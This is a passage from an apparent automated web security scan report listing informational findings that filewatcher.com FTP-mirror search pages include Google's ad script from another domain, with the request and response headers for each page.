<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.985. http://www.filewatcher.com/m/aub-0-2.0.5-10.noarch.hdr.1690.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-0-2.0.5-10.noarch.hdr.1690.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-0-2.0.5-10.noarch.hdr.1690.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:48 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "QQml4ktaVHbqcfZUpXtwYA"
Content-Length: 17403
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 778
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-0-2.0.5-10.noarch.hdr - FTP
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.986. http://www.filewatcher.com/m/aub-2.0.5-10.noarch.rpm.73595.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.0.5-10.noarch.rpm.73595.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5-10.noarch.rpm.73595.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:49 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "kb4TXdSKnZ1h8CU+CKDojw"
Content-Length: 17576
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:49 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 777
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5-10.noarch.rpm - FTP Mi
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.987. http://www.filewatcher.com/m/aub-2.0.5-10.src.rpm.82336.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.0.5-10.src.rpm.82336.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5-10.src.rpm.82336.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:50 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "LM9OvRRHsvjVQOMUmCquMw"
Content-Length: 16844
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:50 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 797
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5-10.src.rpm - FTP Mirro
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.988. http://www.filewatcher.com/m/aub-2.0.5.tgz.20.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.0.5.tgz.20.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.20.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:25 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "0A95pkRUYm45gupQF4bVRg"
Content-Length: 22773
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:25 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 772
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.989. http://www.filewatcher.com/m/aub-2.0.5.tgz.32459.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.0.5.tgz.32459.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32459.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:21 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "/ffMyujUnh/9Jd7V+CQhhQ"
Content-Length: 19384
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 772
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.990. http://www.filewatcher.com/m/aub-2.0.5.tgz.32461.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.0.5.tgz.32461.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32461.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:36 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "wGhl6cEsFXKOoMN1Y2Fi+g"
Content-Length: 19552
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:36 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 777
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.991. http://www.filewatcher.com/m/aub-2.0.5.tgz.32462.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.0.5.tgz.32462.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32462.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:38 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "lNEQmr3IejFLBeSLsNGCcA"
Content-Length: 19279
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:38 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 778
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.992. http://www.filewatcher.com/m/aub-2.0.5.tgz.32465.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.0.5.tgz.32465.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32465.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:35 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "envM1eLceR86ygBGGbUowA"
Content-Length: 19849
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 777
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.993. http://www.filewatcher.com/m/aub-2.0.5.tgz.32466.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.0.5.tgz.32466.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32466.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:20 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "4GpI7BCi/0IfwFWZf3oDpw"
Content-Length: 19492
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:20 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 770
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.994. http://www.filewatcher.com/m/aub-2.0.5.tgz.32467.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.0.5.tgz.32467.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32467.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:18 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ARojwTn+kWooNUMrINf0eg"
Content-Length: 19159
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 766
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.995. http://www.filewatcher.com/m/aub-2.0.5.tgz.32468.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.0.5.tgz.32468.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32468.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:30 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "bIM+O2jPLbkd3cE+/479XA"
Content-Length: 19636
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 774
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.996. http://www.filewatcher.com/m/aub-2.0.5.tgz.32469.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.0.5.tgz.32469.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32469.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:17 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "44be+G2/Nb+wI+zEZHCvpA"
Content-Length: 19369
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:17 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 765
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.997. http://www.filewatcher.com/m/aub-2.0.5.tgz.32470.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.0.5.tgz.32470.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32470.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:28 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "Tyr6lm+Qnki2QK4YsJffzg"
Content-Length: 19531
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:28 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 776
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.998. http://www.filewatcher.com/m/aub-2.0.5.tgz.32471.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.0.5.tgz.32471.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32471.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:24 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ifUTv9SpIvdsVXEMGHc0sA"
Content-Length: 19480
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:24 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 770
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.999. http://www.filewatcher.com/m/aub-2.0.5.tgz.32472.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.0.5.tgz.32472.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32472.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:15 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "84U4dCKLsk1Z+aOAvuuTBw"
Content-Length: 19024
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 763
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1000. http://www.filewatcher.com/m/aub-2.0.5.tgz.32473.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.0.5.tgz.32473.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32473.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:14 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "IVQsFoHz1k0Mbag9DHc9Zw"
Content-Length: 19153
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:14 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 763
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1001. http://www.filewatcher.com/m/aub-2.0.5.tgz.32474.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.0.5.tgz.32474.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /m/aub-2.0.5.tgz.32474.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:27 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "GU55O58VehxXeXOVB1+efA"
Content-Length: 19315
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:27 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 772
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>aub-2.0.5.tgz - FTP Mirror Searc
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

21.1002. http://www.filewatcher.com/m/aub-2.0.5.tgz.32475.0.0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.filewatcher.com
Path:	/m/aub-2.0.5.tgz.32475.0.0.html

Issue detail

The response dynamically includes the following script from another domain:

http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

